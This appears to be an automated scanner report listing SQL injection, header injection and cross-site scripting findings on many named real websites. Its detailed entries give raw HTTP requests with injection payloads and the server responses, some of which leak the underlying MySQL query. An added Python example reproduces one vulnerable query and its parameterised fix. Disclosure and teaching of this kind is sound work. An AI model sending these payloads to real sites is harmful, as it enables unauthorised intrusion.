XSS, Cross Site Scripting, DORK Report for April 1, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 06:15:48 CDT 2011.


1. SQL injection

1.1. http://www.almanac.com/server-status [REST URL parameter 1]

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1]

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]

1.5. http://www.comannet.com/server-status [REST URL parameter 1]

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]

1.7. http://www.essortment.com/server-status [REST URL parameter 1]

1.8. http://www.excite.com/server-status [REST URL parameter 1]

1.9. http://www.helium.com/server-status [name of an arbitrarily supplied request parameter]

1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]

1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]

1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]

1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]

1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]

1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]

1.16. http://www.travelscream.com/server-status [REST URL parameter 1]

1.17. http://www.usf.edu/server-info [REST URL parameter 1]

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]

1.19. http://www.usf.edu/server-status [REST URL parameter 1]

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]

1.21. http://www.x17online.com/server-status [REST URL parameter 1]

2. HTTP header injection

2.1. http://www.elitistjerks.com/server-status [REST URL parameter 1]

2.2. http://www.ew.com/server-status [REST URL parameter 1]

2.3. http://www.people.com/server-status [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://www.2dopeboyz.com/server-status [REST URL parameter 1]

3.2. http://www.2dopeboyz.com/server-status [name of an arbitrarily supplied request parameter]

3.3. http://www.4shared.com/server-status [REST URL parameter 1]

3.4. http://www.4shared.com/server-status [REST URL parameter 1]

3.5. http://www.abcteach.com/server-info [REST URL parameter 1]

3.6. http://www.abcteach.com/server-info [name of an arbitrarily supplied request parameter]

3.7. http://www.abcteach.com/server-status [REST URL parameter 1]

3.8. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]

3.9. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]

3.10. http://www.americanpregnancy.org/server-status [REST URL parameter 1]

3.11. http://www.answerbag.com/server-status [REST URL parameter 1]

3.12. http://www.bomb-mp3.com/server-status [REST URL parameter 1]

3.13. http://www.bomb-mp3.com/server-status [REST URL parameter 1]

3.14. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]

3.15. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]

3.16. http://www.bordersrewardsperks.com/server-info [REST URL parameter 1]

3.17. http://www.bordersrewardsperks.com/server-status [REST URL parameter 1]

3.18. http://www.businessworkforce.com/server-status [name of an arbitrarily supplied request parameter]

3.19. http://www.calorie-count.com/server-status [REST URL parameter 1]

3.20. http://www.calorie-count.com/server-status [name of an arbitrarily supplied request parameter]

3.21. http://www.circleofmoms.com/server-status [REST URL parameter 1]

3.22. http://www.circleofmoms.com/server-status [REST URL parameter 1]

3.23. http://www.circleofmoms.com/server-status [REST URL parameter 1]

3.24. http://www.cj.com/server-status [name of an arbitrarily supplied request parameter]

3.25. http://www.classesandcareers.com/server-status [REST URL parameter 1]

3.26. http://www.collegehumor.com/server-status [REST URL parameter 1]

3.27. http://www.collegehumor.com/server-status [REST URL parameter 1]

3.28. http://www.computerhope.com/server-status [REST URL parameter 1]

3.29. http://www.computerhope.com/server-status [name of an arbitrarily supplied request parameter]

3.30. http://www.csmonitor.com/server-status [REST URL parameter 1]

3.31. http://www.csmonitor.com/server-status [name of an arbitrarily supplied request parameter]

3.32. http://www.dailyjobposts.com/server-status [REST URL parameter 1]

3.33. http://www.diabetes.org/server-info [REST URL parameter 1]

3.34. http://www.diabetes.org/server-status [REST URL parameter 1]

3.35. http://www.dipity.com/server-status [REST URL parameter 1]

3.36. http://www.docstoc.com/server-status [REST URL parameter 1]

3.37. http://www.docstoc.com/server-status [name of an arbitrarily supplied request parameter]

3.38. http://www.dorkly.com/server-status [REST URL parameter 1]

3.39. http://www.education.com/server-status [REST URL parameter 1]

3.40. http://www.elyrics.net/server-status [REST URL parameter 1]

3.41. http://www.elyrics.net/server-status [name of an arbitrarily supplied request parameter]

3.42. http://www.foreignpolicy.com/server-status [REST URL parameter 1]

3.43. http://www.foreignpolicy.com/server-status [REST URL parameter 1]

3.44. http://www.gamespot.com/server-status [REST URL parameter 1]

3.45. http://www.gamestop.com/server-status [REST URL parameter 1]

3.46. http://www.gamestop.com/server-status [name of an arbitrarily supplied request parameter]

3.47. http://www.gather.com/server-status [REST URL parameter 1]

3.48. http://www.gather.com/server-status [REST URL parameter 1]

3.49. http://www.groupfusion.net/server-status [REST URL parameter 1]

3.50. http://www.hawaii.edu/server-status [REST URL parameter 1]

3.51. http://www.hawaii.edu/server-status [name of an arbitrarily supplied request parameter]

3.52. http://www.instructables.com/server-status [REST URL parameter 1]

3.53. http://www.jotform.com/server-status [REST URL parameter 1]

3.54. http://www.listal.com/server-status [REST URL parameter 1]

3.55. http://www.listal.com/server-status [name of an arbitrarily supplied request parameter]

3.56. http://www.magazines.com/server-status [REST URL parameter 1]

3.57. http://www.manta.com/server-status [REST URL parameter 1]

3.58. http://www.manta.com/server-status [REST URL parameter 1]

3.59. http://www.marthastewart.com/server-status [REST URL parameter 1]

3.60. http://www.medications.com/server-status [REST URL parameter 1]

3.61. http://www.nationalguard.com/server-status [REST URL parameter 1]

3.62. http://www.nyu.edu/server-info [name of an arbitrarily supplied request parameter]

3.63. http://www.nyu.edu/server-status [name of an arbitrarily supplied request parameter]

3.64. http://www.offers.com/server-status [REST URL parameter 1]

3.65. http://www.patch.com/server-status [REST URL parameter 1]

3.66. http://www.pcpitstop.com/server-status [name of an arbitrarily supplied request parameter]

3.67. http://www.picosearch.com/server-status [REST URL parameter 1]

3.68. http://www.prescriptiondrug-info.com/server-status [name of an arbitrarily supplied request parameter]

3.69. http://www.pronto.com/server-status [REST URL parameter 1]

3.70. http://www.rzaz.net/server-status [REST URL parameter 1]

3.71. http://www.rzaz.net/server-status [REST URL parameter 1]

3.72. http://www.rzaz.net/server-status [REST URL parameter 1]

3.73. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

3.74. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

3.75. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

3.76. http://www.simplejobing.com/server-status [REST URL parameter 1]

3.77. http://www.smartertravel.com/server-status [REST URL parameter 1]

3.78. http://www.tech-archive.net/server-status [REST URL parameter 1]

3.79. http://www.tech-archive.net/server-status [REST URL parameter 1]

3.80. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]

3.81. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]

3.82. http://www.thenation.com/server-status [REST URL parameter 1]

3.83. http://www.thenation.com/server-status [name of an arbitrarily supplied request parameter]

3.84. http://www.theroot.com/server-status [REST URL parameter 1]

3.85. http://www.thestar.com/server-status [REST URL parameter 1]

3.86. http://www.thestar.com/server-status [name of an arbitrarily supplied request parameter]

3.87. http://www.toledoblade.com/server-info [REST URL parameter 1]

3.88. http://www.toledoblade.com/server-status [REST URL parameter 1]

3.89. http://www.traderonline.com/server-status [REST URL parameter 1]

3.90. http://www.umd.edu/server-status [REST URL parameter 1]

3.91. http://www.umd.edu/server-status [name of an arbitrarily supplied request parameter]

3.92. http://www.utk.edu/server-info [REST URL parameter 1]

3.93. http://www.utk.edu/server-status [REST URL parameter 1]

3.94. http://www.weei.com/server-status [REST URL parameter 1]

3.95. http://www.4shared.com/server-status [Referer HTTP header]

3.96. http://www.abcteach.com/server-info [Referer HTTP header]

3.97. http://www.bnet.com/server-status [Referer HTTP header]

3.98. http://www.careerbuilder.com/server-status [Referer HTTP header]

3.99. http://www.evite.com/server-status [Referer HTTP header]

3.100. http://www.fool.com/server-status [Referer HTTP header]

3.101. http://www.gamespot.com/server-status [Referer HTTP header]

3.102. http://www.hawaii.edu/server-status [Referer HTTP header]

3.103. http://www.phonenumber.com/server-info [Referer HTTP header]

3.104. http://www.pogo.com/server-status [Referer HTTP header]

3.105. http://www.shutterfly.com/server-status [Referer HTTP header]

3.106. http://www.surveygizmo.com/server-status [User-Agent HTTP header]

3.107. http://www.toysrus.com/server-status [Referer HTTP header]

3.108. http://www.arstechnica.com/server-info [REST URL parameter 1]

3.109. http://www.arstechnica.com/server-status [REST URL parameter 1]

3.110. http://www.azstarnet.com/server-status [REST URL parameter 1]

3.111. http://www.officialpayments.com/server-status [REST URL parameter 1]

3.112. http://www.officialpayments.com/server-status [name of an arbitrarily supplied request parameter]

3.113. http://www.tns-global.com/server-status [name of an arbitrarily supplied request parameter]



1. SQL injection
There are 21 instances of this issue:


1.1. http://www.almanac.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.almanac.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15683602'%20or%201%3d1--%20 and 15683602'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way. Both responses are 404 pages served by the same Drupal front end; in the excerpts shown, the only visible differences are the echoed payload inside the destination= links and the per-request form_build_id token, so the differing Content-Length on its own is weak evidence.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status15683602'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:04 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=aqdrue1g1femjn1184avvm59u0; expires=Mon, 25 Apr 2011 05:35:24 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-9c5995c6232e15094ed8efbadb093bcd" value="form-9c5995c6232e15094ed8efbadb093bcd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D1--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D1--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

Request 2

GET /server-status15683602'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.almanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:02:05 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:02:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: SESS095d323cd8058abaa3a07a4ec41b18d5=thrjklvktfllcbbrnrtksti2o0; expires=Mon, 25 Apr 2011 05:35:25 GMT; path=/; domain=.almanac.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 32343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<me
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-c33428d33a05097a7fac9f7ca4d293bd" value="form-c33428d33a05097a7fac9f7ca4d293bd" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
<input type="hidden" name="default_text" id="edit-default-text" value="Keywords..." class="default-text" />
</div>

</div></form>
</div>
        <div id="my-account">
<a href="/user" title="My Account" class="button">My Account</a><a href="/user/register?destination=server-status15683602%27+or+1%3D2--+" title="New? Register">New? Register</a> | <a href="/user/login?destination=server-status15683602%27+or+1%3D2--+" title="Log In">Log In</a> </div>
</div><a href="http://twitter.com/almanac" target="_blank"><img class="twitter" src="/sites/new.almanac.com/themes/almanac960/images/t_small-a.png" alt="Follow the Almanac on Twitter" /></a>
       <a href="http://www.facebook.com/theoldfarmersalmanac" target="_blank"><img class="facebook" src="/sites/new.almanac.com/themes/almanac960/images/facebook-connect.png" alt="Become a Facebook Fan of the Almanac" /></a>
<a href="/content/rss"><img class="rss" src="/sites/new.almanac.com/themes/almanac960/images/rss-icon.png" alt="The Old Farmer's Almanac RSS Feed" /></a>
<a href="/store" class="shop">Shop</a> <a href="/store"><img class="cart" src="/sites/new.almanac.com/themes/almanac960/images/shopping-cart.png" alt="The Old Farmer's Almanac.com General Store" /></a>
<a onClick="_gaq.push(['_trackEvent', 'Web promo ad', 'Click Free 2 month LRW', 'LRWF']);" href="/weather/longrange">
<img class="lrweather" src="/sites/new.almanac.com/themes/almanac960/images/free-lrweather.png" alt="Free 2-Month Long-Range Weather" /></a>

<div id="site-header" class="clear-block">
<div id="branding" class="grid-4 imgfilter">

<div id="fb-like">
        <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.facebook.com/theoldfarmersalm
...[SNIP]...

1.2. http://www.beeg.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beeg.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. The error text discloses the query itself: the request path is concatenated unescaped into SELECT * FROM `sellers_paysites` WHERE `Ps_Code` = '...' AND `Name` = '', so every request path, not only /favicon.ico, reaches this query. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /favicon.ico' HTTP/1.1
Host: www.beeg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:13:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 303

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'favicon.ico'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'' AND `Name` = ''' at line 1]

1.3. http://www.beeg.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: a doubled quote is the SQL escape for a literal single quote inside a string, so the query parses again and the normal 404 page comes back. That pairing is what distinguishes a quoting flaw in the query from a generic error page. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 307

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status'' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''server-status'' AND `Name` = ''' at line 1]

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.4. http://www.beeg.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beeg.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The error text shows `Ps_Code` = 'server-status?1'=1', i.e. the application never parses the query string at all: the whole request URI, path and query string together, is concatenated into the query, so the "parameter name" is simply another slice of the same injection point. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /server-status?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 296

DB Error: syntax errorSELECT * FROM `sellers_paysites` WHERE `Ps_Code` = 'server-status?1'=1' AND `Name` = '' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND `Name` = ''' at line 1]

Request 2

GET /server-status?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beeg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 02:08:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.5
Content-Length: 1832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
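The query shape disclosed in the beeg.com error messages in 1.2 through 1.4, rebuilt over SQLite as an added example for this page (it is not beeg.com's code and not part of the original report). The error text shows the full request URI, path and query string alike, concatenated into SELECT * FROM `sellers_paysites` WHERE `Ps_Code` = '...' AND `Name` = ''. The column names Ps_Code and Name and the WHERE clause come from the report; the table rows, the Url column and the function names are assumptions. MySQL and SQLite both treat a doubled single quote inside a string literal as an escaped quote, which is why the `''` probe clears the error in the findings above.

```python
"""Rebuild of the disclosed beeg.com query over SQLite (added example).

Shows why `'` breaks the query, why `''` does not, why the query-string
"parameter name" is just more of the same string, how a `' OR 1=1 --`
suffix widens the result set, and what the parameterised fix looks like.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table named after the one in the error message.
    The rows and the Url column are constructed, not from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sellers_paysites (Ps_Code TEXT, Name TEXT, Url TEXT)")
    conn.executemany(
        "INSERT INTO sellers_paysites VALUES (?, ?, ?)",
        [
            ("site-a", "", "http://a.example/"),
            ("site-b", "", "http://b.example/"),
            ("site-c", "partner", "http://c.example/"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, request_uri: str):
    """String concatenation, as the disclosed query implies: the request
    URI minus its leading slash becomes the Ps_Code literal.
    Returns (rows, None) on success or (None, error_text) on a DB error,
    mirroring the 'DB Error: ...' page the site returned."""
    ps_code = request_uri.lstrip("/")
    sql = (
        "SELECT * FROM sellers_paysites "
        f"WHERE Ps_Code = '{ps_code}' AND Name = ''"
    )
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return None, f"DB Error: {exc} -- {sql}"


def lookup_fixed(conn: sqlite3.Connection, request_uri: str):
    """Same lookup with a bound parameter: the value can never change the
    statement's structure, so quotes and comment markers are just data."""
    ps_code = request_uri.lstrip("/")
    sql = "SELECT * FROM sellers_paysites WHERE Ps_Code = ? AND Name = ''"
    return conn.execute(sql, (ps_code,)).fetchall(), None


if __name__ == "__main__":
    db = make_db()
    for uri in ("/server-status'", "/server-status''", "/server-status?1'=1",
                "/x' OR 1=1 --", "/site-a"):
        rows, err = lookup_vulnerable(db, uri)
        print(f"vulnerable {uri!r}: {err or rows}")
        rows, err = lookup_fixed(db, uri)
        print(f"fixed      {uri!r}: {rows}")
```

The `'` and `?1'=1` requests reproduce the two error cases in the report, the `''` and `?1''=1` requests parse cleanly and return no rows, and the `' OR 1=1 --` request returns every row through the concatenated query while the parameterised version returns none.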

1.5. http://www.comannet.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21186257'%20or%201%3d1--%20 and 21186257'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way. Note, however, that neither response is application output: one is Apache's own 403 page and the other its 404 page, and nothing in either shows a database being queried, so treat this as unconfirmed.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status21186257'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 353
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status21186257' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status21186257'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status21186257' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.6. http://www.comannet.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.comannet.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 93324201%20or%201%3d1--%20 and 93324201%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which may indicate that the input is being incorporated into a SQL query in an unsafe way. As in 1.5, both responses are Apache's own 403 and 404 error pages, the query string is not even reflected in them, and nothing shows a database being queried, so treat this as unconfirmed.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?193324201%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:40:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Request 2

GET /server-status?193324201%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comannet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:40:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Content-Length: 330
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /server-status was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

1.7. http://www.essortment.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned ("GrammarParsingError": "Invalid CQL : '"), which shows the request path reaching a query-language parser rather than necessarily a SQL database; the response is also a 404 whose body reports an internal HTTP 500. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 03:00:05 GMT
Connection: close

